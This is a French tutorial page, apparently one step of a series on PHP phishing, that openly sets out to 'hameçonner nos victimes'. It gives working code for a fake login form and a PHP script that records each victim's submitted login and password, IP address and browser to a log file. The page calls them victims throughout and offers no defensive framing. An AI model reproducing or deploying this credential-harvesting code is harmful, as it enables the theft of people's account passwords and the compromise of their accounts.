Mise en place du script :: Panda-Project

Accueil - Tutoriaux - Phishing (php) - Mise en place du script

Mise en place du script

Ici on va mettre en place le script qui va nous servir à hameçonner nos victimes.

Partie HTML

on aura besoin de deux formulaires et un bouton de type submit.

Code : HTML

< html > < head > < title >Titre < /title > < /head > < body > < form method="POST" action="phish.php" > Login : < input name="login" id="login" / >< br / > Pass : < input name="passwd" id="passwd" type="password"/ >< br / > < input type="submit" value="Confirmer" / > < /form > < /body > < /html >

Le résultat devrais plus ou moins ressembler à ça :

RésultatLogin
Password

Partie PHP :

Ici on va faire en sorte de récupérer le login + password, l'ip de la victime, son navigateur et même son OS.
Pré-nécessaire : Utilisation des fichiers en php (lecture et écriture) + connaissance des variables super-globales, tel que POST ...

Code : php

< ? php
// obtention de l'ip + navigateur et OS

            $ip = $_SERVER ['REMOTE_ADDR'] ;

            $navi = $_SERVER ['HTTP_USER_AGENT'] ;
$str = "[+] IP => $ip\n[+] Web Browser => $navi\n" ;
// login + mdp

            $login = $_POST ['login'] ;

            $mdp = $_POST ['passwd'] ;
$str = $str . "[+] Login => $login\n[+] Password => $mdp\n====================\n" ;
// stockage dans un fichier texte

            $ff = fopen ("log.phish", "a+") ;

            fputs ($ff, $str) ;

            fclose ($ff) ;

            ? >

Bien, maintenant on en a fini avec les deux partie (HTML et PHP), on n'a plus qu'à les mettre dans le dossier test créé tout à l'heure.
Bon on a pratiquement tout ce qu'il nous faut pour faire un bon phishing, tout sauf ...

Contact

unn@med

Voir "Contact" Pour m'envoyer un email